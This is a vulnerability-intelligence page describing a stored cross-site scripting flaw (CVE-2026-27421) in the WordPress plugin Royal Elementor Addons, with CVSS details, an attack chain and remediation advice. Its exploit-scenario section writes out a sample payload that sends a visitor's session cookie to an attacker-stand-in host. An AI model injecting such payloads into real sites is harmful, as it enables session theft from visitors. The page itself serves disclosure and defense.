Skip to main content

Royal Elementor Addons EUVD-2026-28338

| CVE-2026-27421 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-05-07 Patchstack GHSA-h3xh-5g78-fc7p
XSS Royal Elementor Addons Elementor
6.5
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
6.5 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
Low

Lifecycle Timeline

3
Patch available
May 07, 2026 - 10:16 EUVD
Analysis Generated
May 07, 2026 - 09:00 vuln.today
CVE Published
May 07, 2026 - 07:31 nvd
MEDIUM 6.5

DescriptionCVE.org

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WProyal Royal Elementor Addons allows Stored XSS.

This issue affects Royal Elementor Addons: from n/a before 1.7.1053.

AnalysisAI

Stored cross-site scripting (XSS) in WProyal Royal Elementor Addons before version 1.7.1053 allows authenticated users with limited privileges to inject malicious scripts into web pages, which execute in the browsers of site visitors. The vulnerability requires user interaction (UI:R in CVSS) and is limited to users with login credentials (PR:L), but once stored, affects all visitors regardless of their privileges. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Authenticate as contributor
Delivery
Access Elementor page editor
Exploit
Insert malicious payload in Royal Elementor Addons widget
Install
Save/publish page
C2
Visitor loads page
Execute
JavaScript executes in visitor browser
Impact
Attacker steals session cookie or performs action
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires: (1) authenticated access to WordPress with at least contributor-level permissions to create or edit posts/pages, (2) ability to insert or modify Royal Elementor Addons widgets on a page, and (3) a site visitor viewing the page containing the malicious widget. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 6.5 (Medium severity) with CVSS vector AV:N/AC:L/PR:L/UI:R/S:C indicates network-accessible vulnerability requiring low attack complexity but necessitating authenticated access and user interaction. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with WordPress contributor or editor credentials logs into the target website's admin dashboard and creates or edits a page using Elementor. Within a Royal Elementor Addons widget setting field, the attacker injects a stored XSS payload such as '<img src=x onerror="fetch('https://attacker.com/?cookie='+document.cookie)">'. …
Remediation Update Royal Elementor Addons to version 1.7.1053 or later immediately. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-28338 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy